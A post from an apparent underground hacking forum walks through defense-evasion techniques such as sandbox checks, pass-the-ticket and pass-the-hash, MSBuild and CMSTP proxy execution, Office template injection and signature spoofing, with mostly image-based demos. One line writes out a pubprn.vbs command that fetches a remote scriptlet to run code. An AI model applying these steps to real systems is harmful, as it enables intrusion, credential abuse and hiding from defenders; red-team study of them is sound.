HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Pentest Red Team Techniques - Defense Evasion

dEEpEst

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
27
Reaction score
45,546
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%

Defense Evasion​

The adversary is trying to avoid being detected.

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries may also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics' techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
 

Virtualization/Sandbox Evasion​

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in a analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.
 

Time Based Evasion​

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.

Example

Ok so I won't put an example on this one but I will point you to an article that is great in explaining a recent attack (SolarWinds) as of time of writing this, in short what happened here the Malware waited for 2 weeks!!, before executing and running its malicious code to evade defenses, a legitimate software running normally without executing no malicious connections immediately like many others this one actually waited for 2 weeks. Take a good read at what happen as this one is great, just as mentioned before Tasks/Jobs are good for this demo.

References:

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.

 

User Activity Based Checks​

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of check for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks, browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate.

Example

In this example will be using all with user permission, of course we can grab more activity like logs, and registry info but these will require more elevated permissions from here we will just make sure the User has files in their Documents Folder, something above 10 files so we know that is a legitimate active user and not a recently created, in a virtual environment only used for Debuggers.

image

Above you see the code used in PowerShell to found the count of how many files are in the Documents Directory. If the count is above 8 then it will print out OK but if not then a simple NOPE will run instead.

image

We see above that we have 8 Files in the Documents Directory just to verify this, so now by executing our script it should just print NOPE.

image

Exactly as intended, this is another good method to evade systems as we verify if this is an actual working and active user for an environment that has working files or is at least active in a working environment folder which Documents, Downloads, Pictures are very common for employees.
 

System Checks​

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Specific checks may will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/products fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.

Example

In the following sample I will demonstrate a simple bat file that an adversary may create to do a simple System Check and if it finds a specific string VirtualBox it will terminate its execution but if not then it will continue and execute the malicious code.

image

Above you can see the simple scripting code, it will first run the systeminfo command, to grab all the information of the PC, it will save the info to a file and then will use the findstr command to search for certain strings in this case it will be VirtualBox then by using if/else this will help that if the string is found then it will NOT execute, but if not found then it will continue its execution.

In the Demo here you can see that it search for the VirtualBox string, this technique can be moved to finding programs like Debuggers or Hardware to stop the execution of the script. This is a simple demo on how these techniques can be pushed to find even more checks and be aware that we aren't running in a virtual environment.

Demo-SystemCheck:

image
 

Use Alternate Authentication Material​

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication material allows the system to verify an identity has successfully
 

Pass the Ticket​

Adversaries may 'pass the ticket' using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the Ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

In this technique, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending in the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.

Silver Ticket can be obtained for services that user Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).

Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.

Example

This demonstration will also cover Silver Tickets

Now on this scenario we have a share inaccessible by our domain user that we currently hold DC\Dwinchester. But we are aware of another user that can.

Jwinchester, this being since the users is part of the Data Engineers Group

image

image

And that folder has permissions for that user. We can see that our current user has no permissions to even check the

permissions itself.

image

Since it's a DB folder we try to search for a user that has DB permissions we already know this with Jwinchester.

image

John is the perfect candidate, now let's get a ticket for this account. We will use a tool to grab SPNs

image

And Request the Ticket

image

We will then export the tickets and crack them offline. Crack the ticket and convert it to an NTLM Hash for Demo purposes this is already done.

image

Create the Silver Ticket

image

And remember the share we had no access too?. We can now enumerate the files on the Share

image

References:

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.
 

Pass the Hash​

Adversaries may "pass the hash" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.

Example

Let's start by showing why this is a great technique for Defense Evasion the most secure thing available is at the Boot up of the Screen.

image

Now how can we avoid this part without having the cleartext password of the User and avoiding any login screens, and prompts all the good stuff that might give us away?.

By passing the Hash this is a great technique that will authenticate silently and even when creating a Log it will throw an ID Log 4624

In this Demo will use PSEXEC it's great for this sample and it allows authentication with hashes. (You must already have a hash here, be creative, mimikatz, crackmap, lsassy.)

PsExec

image

In the above image the authentication using Hashes has been successful be wary that there are some requirements for this to work for example a share with Administrative Access has to be available and the LocalAccountTokenPolicy Registry Key needs to be set at a Value of 1.

This topic is very extensive and there are many tools that can help with this CrackMapExec, SMBExec, WmiExec, Lsassy.

And others do please try and experiment and see what is being left behind, maybe a file?, a log?. When we use PsExec from Sysinternals it leaves a Registry Key when accepting the EULA but what about PsExec.py??.

References:

This link is hidden for visitors. Please Log in or register now.
 

Trusted Developer Utilities Proxy Execution​

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
 

MSBuild​

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.

Example

In this Demo MSBuild is a proper tool for executing code specially C# inserted in an XML project file. MSBuild will compile and execute the inline task.

By searching the Binary in its path or using the Developer Command Prompt we can execute the payload by passing the full path as a parameter in this demo the payload is on the target machine for demonstration purposes, the utility is proxy aware so a payload can be called from a remote host.

image

We see the execution and lets verify a shell

image

We view from Process Explorer that MSBuild is a child process and being called

image

But from Procmon we also see the files it calls and the Connections that are being made

image

One of the good things of MSBuild is that it cleans after the connection is closed.

image

This is good for OPSEC but still be aware that a file still is created and touches Disk, TEMP file but still some forensic evidence.

Demo

image
 

Template Injection​

Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft's Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.

Properties within parts may reference shared public resources access via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries mat abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.

This technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.

Example

For this Demo we now create a docs file that will try and reach out to our attacking machine from a remote source. The easiest way to do this is to create a doc document from one of the provided Word templates, and just modify the target.

image

Now we will just need to modify the document to accommodate it to our phishing needs, with the release of Office 2007, Microsoft introduced formats that end with the 'x' character, each of these formats are just zip files containing mostly .xml and .rel files. We are going to manually edit these properly and then zip them back together.

image

Once unzip we will navigate to the word >> _rels >> settings.xml file and search for the Target value.

image

We edit it to point to our remote host.

image

Once the file is being loaded you will notice it's trying to reach out to our Remote Host

image

I set responder to be listening for any traffic

image

Note:

OK so I was trying to Unzip the files but was getting errors that the file was damaged, so to get around this all I did was drag and drop the payload to the normal file just to replace the document, instead of unzipping the file all I did was rename it to ZIP so I can access the XML files

image

In the upper image I just dragged and dropped the upper file to the bottom window and renamed it back to docx WITHOUT the unzipping

Demo:

image

References:

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.
 

Subvert Trust Controls​

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depends on the specific mechanism they seek to subvert. Adversaries may conduct File and Directory Permissions Modification or Modify Registry in support of subverting these controls. Adversaries may also create or steal code signing certificates to acquire trust on target systems.
 

SIP and Trust Provider Hijacking​

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application controls tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as asfe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.

Becausse of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all) and are identified by globally unique identifiers (GUIDs).

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimate signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tool to classify malicious (or any) code as signed by:

· Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{{SIP_GUID}} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP
This link is hidden for visitors. Please Log in or register now.
(although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

· Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{{SIP_GUID}} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP
This link is hidden for visitors. Please Log in or register now.
(with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

· Modifying the DLL and Function Registry values in HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\Providers\Trust\FinalPolicy{{trust provider GUID}} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

· Note: The above hijacks are also possible without modifying the Registry via
This link is hidden for visitors. Please Log in or register now.
.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.
 

Code Signing​

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificate used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

Example

CarbonCopy a tool built by paranoidninja for spoofing Digital Signatures, signatures like these can actually bypass AV and pass undetected by analysts because they provide a level of authenticity. See 2 payloads with and without a Digital Signature.

image

Now will check out the digitally signed one a little more to check what it contains.

image

A Digital Signature not installed of course this is why we see that it cannot be verified.

image

We have the option to install this certificate of course with proper permissions but here I am just trying to demonstrate how this "Signature" can provide some level of authenticity since it is Signed by Microsoft, of course a solid analyst can see that this has been valid from a recent Date. So how can we build this digitally signed binary, with CarbonCopy.

image

Above we see a successful spoofed Signature the requirements for this is very simple the website we are trying to spoof its signature the port the target payload and an output file.

You will also need OSSLSignedCode tool to be installed.

References:

This link is hidden for visitors. Please Log in or register now.
 

Signed Script Proxy Execution​

Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.

PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site. An example commands is

<strong>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</strong>

Example

Could not Replicate, I wasn't receiving errors and could find the payload I was pointing at if any suggestions

image

References:

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.

This link is hidden for visitors. Please Log in or register now.
 

Signed Binary Proxy Execution​

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.
 

Compiled HTML File​

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, Jscript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe).

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe

Example

In this Demo a simple CHM file created and being executed, I have added references to manually and automatically create these payloads

Will use the Out-CHM to create the payload, by adding the payload parameter where it is located and the hh.exe utility for it to compile it in a format capable for hh.exe in understanding

image

Once this is done, execution is simple.

image

References:

This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.
 

Control Panel​

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, that latter are actually renamed dynamic-link library (.dll) files that export a CPApplet function. For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.

Malicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware. Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specifications and do not export CPApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPApplet are not directly executable.

Example

In this demo we will compile code to create a functional cpl file format, this is not necessary as these can also be exe format but in this occasion we are using this for demo purposes but also to demonstrate the different type of executable formats.

image

Once compile we can execute with a double-click on the file or simply using control.exe, you will need to add the full path of the payload.

Demo

References:

This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.
 

CMSTP​

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMTSP.exe) is command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / "Squiblydoo", CMSTP.exe may abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.

Example

This one was a little tricky as we needed to create an inf file but also have an sct file waiting for us remotely to execute code, as this will use the scrobj.dll to execute our code as well.

image

Then execution should be simple

image

Careful as this will create a VPN Connection and leave a shortcut on the Desktop as well, a way to avoid this is to actually gain a shell (PowerShell, CMD) in this demo the reason (I think?) it is being left behind is because execution finalizes and doesn't stay in a continuous running state such as when receiving a shell

References:

This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.


https://twitter.com/x/status/958450014111633408
 

InstallUtil​

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. Installutil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framewrok64\v\installUtil.exe

InstallUtil amy also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].

Example

In the following example I created a C# binary that will execute calc after looking at some examples (penteslab) mainly it says that it will execute binaries in C# code, so by this I compiled it and use IntallUtil to execute the binary itself

This seems to be true if you don't compile it correctly

image

Demo

image

References:

This link is hidden for visitors. Please Log in or register now.
 
You must log in or register to reply here.
Back
Top